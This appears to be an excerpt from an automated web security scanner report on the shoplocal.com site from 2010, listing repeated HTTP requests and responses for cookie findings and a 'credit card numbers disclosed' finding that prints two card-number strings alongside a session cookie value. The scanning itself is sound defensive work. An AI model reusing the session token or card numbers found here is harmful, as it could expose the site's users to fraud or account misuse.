HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:49 GMT Connection: close Content-Length: 150681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /milk.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:55:52 GMT Connection: close Content-Length: 79125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /muffins.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:44 GMT Connection: close Content-Length: 67734
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /other-cleaning.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:29 GMT Connection: close Content-Length: 162445
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /prepared-foods.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:58:44 GMT Connection: close Content-Length: 155155
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sales.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:50 GMT Connection: close Content-Length: 34602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shoes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:29 GMT Connection: close Content-Length: 86462
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /soda-pop.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:01 GMT Connection: close Content-Length: 146715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spices-herbs.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:43:00 GMT Connection: close Content-Length: 163499
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stores.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:58 GMT Connection: close Content-Length: 70195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /top-deals_grocery.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:41:54 GMT Connection: close Content-Length: 54583
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topdealslanding.aspx HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:40:57 GMT Connection: close Content-Length: 56214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /toppings.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:47:37 GMT Connection: close Content-Length: 78425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /water.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:52:03 GMT Connection: close Content-Length: 161550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wine-spirits.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:49:23 GMT Connection: close Content-Length: 167826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wipes.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:54:16 GMT Connection: close Content-Length: 164447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]...
5. Credit card numbers disclosedprevious There are 2 instances of this issue:
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
The following credit card number was disclosed in the response:
5290497315717161
Request
GET /buns-rolls.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:42:30 GMT Connection: close Content-Length: 99227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following credit card number was disclosed in the response:
4261264090547926
Request
GET /cream-cheese.fp HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Prefs=SLHPageCounter=2&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; ASP.NET_SessionId=dj3azj45bxi1keykzqb1zy45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: Prefs=SLHPageCounter=3&detid=9940000000&SessionCookiesSet=true&referrer=Unknown; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Sat, 20 Nov 2010 18:57:23 GMT Connection: close Content-Length: 77658
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">